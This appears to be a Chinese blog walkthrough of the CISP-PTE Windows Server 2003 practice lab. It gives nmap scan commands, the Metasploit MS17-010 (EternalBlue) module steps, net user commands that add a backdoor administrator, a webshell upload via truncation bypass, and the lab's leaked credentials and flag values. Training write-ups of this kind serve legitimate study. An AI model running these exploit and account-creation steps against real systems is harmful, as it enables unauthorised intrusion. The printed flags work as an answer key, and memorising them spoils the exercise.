CISP-PTE综合靶机-WinServer2003

于 2024-06-23 12:08:33 发布
阅读量247 收藏 1
点赞数 11
文章标签: 笔记 题解 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/139898305
版权 
1.收集网站的地址和开放的端口,完成前期信息收集。10分
2.访问站点,找出站点的敏感文件,利用返回数据找到相关敏感信
息,完成网站结构的信息收集。10分
3.利用文件包含漏洞读取敏感文件,找出数据库连接凭证,利用此
凭证连接数据库。10分
4.网站后台提权:找出后台管理员登录密码、登录站点,拿到第一个
f1ag。10分
5.利用文件上传漏洞,根据提示信息,算出文件名的阶段位置,上
传一句话木马。10分
6.利用菜刀或者蚁剑等工具连接站点,找到第二个f1g。10分
7.连接到站点后,找出MSSQL的管理员登录密码并连接MSSQL进行
提权,并打开xp_cmdshel1.10分
8.利用xp_cmdshel.1关闭防火墙、打开3389端口:10分
9.创建用户并加入管理员组,利用此用户远程登录站点。10分
10.找到管理员桌面的f1ag。10分

直接永恒之蓝

主机发现+端口扫描

  • 使用nmap
sudo nmap -sn 192.168.80.0/24

sudo nmap --min-rate 10000 -p- 192.168.80.142

sudo nmap -sT -sC -sV -O -p135,139,445,1025,1433,3389,27689 192.168.80.142

sudo nmap --script=vuln -p135,139,445,1025,1433,3389,27689 192.168.80.142

image.png

  • 发现27689为web端口
    image.png
  • nmap扫描出永恒之蓝漏洞
    image.png
sudo msfconsole

search ms17-010

use windows/smb/ms17_010_psexec

set RHOSTS 192.168.80.142

exploit

image.png

  • 提权,添加新的管理员
net user 123456 123456 /add

net localgroup administrators 123456 /add

image.png

  • 成功得到所有的flag
key1:4k3s9m3d
key2:2a3s9p4d
key3:4d9d3q8v

image.png
image.png

常规

收集网站的地址和开放的端口

nmap -sn 192.168.87.0/24

nmap --min-rate 10000 -p- 192.168.87.137

image.png

  • 测试发现http://192.168.80.142:27689为web页面

找出站点的敏感文件

  • 目录扫描
    image.png
  • 查看敏感文件
    image.png

连接数据库

  • 访问web.config.bak,下载得到mssql数据库账号密码down/downsql

image.png

网站后台提权得到key1

  • 使用navicat进行连接,得到账号密码admin/asdadwn_d2112
    image.png
  • 得到key1:4k3s9m3d
    image.png

利用文件上传漏洞

  • 发现这里有文件上传
    image.png
  • 不能直接上传,使用截断绕过
    image.png
  • 上传成功
    image.png

蚁剑连接得到key2

  • 路径为/upfile/affix/638544404361093750-12345678.aspx,使用蚁剑连接,得到key2:2a3s9p4d
    image.png
  • 找不到账号密码,发现有永恒之蓝漏洞

最后使用永恒之蓝得到key3

  • nmap扫描出来ms17-010
    image.png

  • 最后在C:/\Documents and Settings/\Administrator/\桌面路径下面成功得到key3:4d9d3q8v
    image.png

尘佑不尘
关注
  • 11
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PTE靶机攻略之Windows
m0_57116761的博客
08-18 2455
26题 这是一道关于Windows权限提升的考题,目标机的IP地址:172.16.12.101,目标的端口范围在27000-28000之间,请利用扫描工具找到开放的端口,开始你的渗透之旅,进入网站后台,请填入key1的值: 解:nmap -p 27000-28000 172.16.12.101 御剑后台扫描工具 => http://172.16.12.101:27689/ 发现robots.txt防御漏洞,下载web.config.bak,并打开发现“database=FileManage;U
CISP-PTE-Windows2003教程
飞花舞者的博客
02-03 1359
防火墙关不掉,师傅们看要怎么搞???
CISP-PTE-Centos 靶机安装(保姆级教程)
honest_gg的博客
07-21 2026
CISP-PTE-Centos:考试(靶机)环境安装
CISP-PTE-centos6靶机教程
飞花舞者的博客
02-04 1294
CISP-PTE中centos靶场,小白训练复习拿来练手。
CISP-PTE靶场搭建
qq_23667585的博客
07-18 3787
CISP-PTE靶场的搭建
CISP-PTE靶场(win+centos).zip
最新发布
03-13
总的来说,CISP-PTE靶场是一个综合性的学习资源,涵盖了信息安全的多个方面,对于希望提升安全技能或准备CISP考试的专业人士来说,是非常有价值的实践平台。通过参与靶场的练习,可以提高对网络安全威胁的理解,提升...
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。该领域的知识体系主要包括账户安全、文件系统安全、日志分析、账户风险与安全策略等几个方面。 账户安全是 Windows 操作系统...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
CISP-PTE培训PPT讲义.zip
09-09
CISP-PTE渗透测试工程师认证培训讲义PPT: 操作系统安全 windows操作系统安全 数据库安全 Web安全基础 HTTP协议 注入漏洞 XSS漏洞 请求伪造漏洞 文件处理漏洞 访问控制漏洞 会话管理漏洞 实战练习 中间件安全-...
cisp-pte考试环境下载-原题 题库
04-01
本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观题与实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的...
CISP-PTE模拟练习网站源码.zip
11-22
CIS-PTE模拟练习网站源码,大家有需要的可以下载练习。祝大家顺利通过考试
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
CISP模拟考试题及答案
07-13
CISP即“注册信息安全专业人员”,系国家对信息安全人员资质的最高认可。英文为Certified Information Security Professional (简称CISP),CISP系经中国信息安全产品测评认证中心(已改名中国信息安全测评中心)实施国家认证。CISP是强制培训的。如果想参加CISP考试,必须要求出具授权培训机构的培训合格证明。
CISP-PTE综合题(一)
Zt_Zk的博客
09-04 4093
一个综合题的靶场,做了一下综合题。
一次零基础靶机渗透细节全程记录
ran的博客
07-12 2613
渗透测试:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
CISP-PTE靶机测试记录
Jach1n
01-31 1192
CISP-PTE靶机测试记录
CISP-PTE靶机真题实训之SQL注入(无法重置密码的情况二)
weixin_46249630的博客
12-09 640
CISP-PTE靶机真题实训之SQL注入(无法重置密码的情况二)思路详解
题目4 命令执行(保姆级教程)【文末有惊喜】
honest_gg的博客
07-21 312
CISP-PTE-Centos:基础题目之命令执行
cisp-pte与cisp
01-09
CISP-PTE和CISP-PTS是两种不同的认证考试,它们之间有一些区别和联系。 CISP-PTE是Certified Information Security Professional - Penetration Testing Engineer的缩写,是一种信息安全专业认证考试。它主要关注渗透测试工程师的技能和知识,包括网络渗透测试、应用程序渗透测试、无线网络渗透测试等方面。 CISP-PTS是Certified Information Security Professional - Penetration Testing Specialist的缩写,也是一种信息安全专业认证考试。与CISP-PTE相比,CISP-PTS在中间件安全、数据库安全和内网安全方面提出了更高的要求。它要求考生除了具备CISP-PTE所要求的全部能力和知识外,还需要在这些特定领域有更深入的了解和实践经验。 因此,CISP-PTE和CISP-PTS之间的区别在于CISP-PTS对于中间件安全、数据库安全和内网安全方面的要求更高。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值